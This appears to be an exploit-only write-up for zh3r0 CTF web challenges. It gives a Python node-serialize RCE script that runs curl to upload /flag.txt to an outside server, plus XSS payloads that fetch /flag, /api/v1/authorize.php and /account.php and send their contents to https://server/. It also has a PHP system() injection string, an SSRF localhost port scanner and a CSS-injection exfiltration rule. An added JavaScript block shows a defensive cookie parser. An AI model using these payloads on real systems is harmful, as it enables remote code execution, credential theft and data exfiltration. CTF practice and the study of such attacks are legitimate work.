Only Exploit Code..
sparta - node-serialize rce
# https://www.exploit-db.com/exploits/49552
import requests
import base64
import sys

url = 'http://web.zh3r0.cf:6666/guest' # change this
payload = """function(){require('child_process').exec('curl -F file1=@/flag.txt server:1234',function(error, stdout, stderr){return stdout;});}()"""
# rce = "_$$ND_FUNC$$_process.exit(0)"
# code ="_$$ND_FUNC$$_console.log('behind you')"
# node-serialize evaluates any value carrying the _$$ND_FUNC$$_ tag on unserialize()
code = "_$$ND_FUNC$$_" + payload
string = '{"country":"worldwide","city":"Tyr", "username":"a","rce": "'+code+'"}'
# the guest cookie is base64-encoded JSON (b64encode needs bytes on Python 3)
cookie = {'guest': base64.b64encode(string.encode()).decode()}
try:
    response = requests.post(url, cookies=cookie).text
    print(response)
except requests.exceptions.RequestException as e:
    print('Oops!')
    sys.exit(1)
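Defender-side counterpart to the cookie above, as an added example that is not part of the original writeup or the challenge's code: parse the base64 guest cookie with JSON.parse instead of node-serialize's unserialize(), reject anything carrying the _$$ND_FUNC$$_ tag, and copy out only the expected fields. The function names, the allow-list and the sample cookies are assumptions constructed for illustration.

```javascript
// Added example: safe handling of a base64 JSON "guest" cookie (names are hypothetical).
const FUNC_MARKER = '_$$ND_FUNC$$_';                     // node-serialize's function tag
const ALLOWED_FIELDS = ['country', 'city', 'username'];  // assumed profile schema

// Recursively look for the tag in any string key or value (objects and arrays).
function containsFuncMarker(value) {
  if (typeof value === 'string') return value.includes(FUNC_MARKER);
  if (value !== null && typeof value === 'object') {
    return Object.entries(value).some(
      ([key, inner]) => key.includes(FUNC_MARKER) || containsFuncMarker(inner));
  }
  return false;
}

// JSON.parse only builds data; it never evaluates function source.
function parseGuestCookie(cookieValue) {
  let obj;
  try {
    obj = JSON.parse(Buffer.from(String(cookieValue), 'base64').toString('utf8'));
  } catch (err) {
    return { ok: false, reason: 'malformed' };
  }
  if (obj === null || typeof obj !== 'object' || Array.isArray(obj)) {
    return { ok: false, reason: 'malformed' };
  }
  if (containsFuncMarker(obj)) {
    return { ok: false, reason: 'serialized-function' }; // log and alert on this
  }
  const profile = {};
  for (const field of ALLOWED_FIELDS) {
    if (typeof obj[field] !== 'string') return { ok: false, reason: 'bad-field' };
    profile[field] = obj[field];                         // unknown keys are dropped
  }
  return { ok: true, profile };
}

// Constructed sample cookies: one benign, one carrying a harmless tagged value.
const encode = (o) => Buffer.from(JSON.stringify(o)).toString('base64');
const benign = encode({ country: 'worldwide', city: 'Tyr', username: 'a' });
const tagged = encode({ country: 'worldwide', city: 'Tyr', username: 'a',
                        rce: FUNC_MARKER + 'function(){}()' });

console.log(parseGuestCookie(benign));
console.log(parseGuestCookie(tagged));
```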
bxxs - xss
<!-- on feedback page -->
<script>
fetch('/flag').then(e=>e.text()).then(e=>{location='https://server/?'%2bbtoa(e)});
</script>
strpos and substr - php code injection
?user=%00%00%27,(system%00)(%27pr%20/*%27),%27
Baby SSRF - ssrf
import requests

# probe ports 1000-9999 on localhost through the /request endpoint
for i in range(1000,10000):
    data = {"url":"http://lvh.me:"+str(i)}
    res = requests.post('http://web.zh3r0.cf:6969/request',data=data)
    # the default page text means nothing answered on that port
    if "Learn about URL" in res.text:
        print("[*] Not Found..")
        continue
    else:
        print("[*] Found! Port : "+str(i))
        continue
# flag -> http://lvh.me:9006/
Original Store - xss
javascript:fetch('/api/v1/authorize.php').then(r=>r.text()).then(r=>{location.href=["https://server/?",r]})
Original Store v2 - xss
javascript:fetch('/account.php').then(r=>r.text()).then(r=>{location.href=["https://server/?",r]})
Flags - CSS injection
<style>
*{display: block !important}
.flag input[value^="zh3r0{this_is_a_flag_02b0482ec93d9f5~~~"] { background: url(https://server/?val=zh3r0{this_is_a_flag_02b0482ec93d9f56a) !important}
...
</style>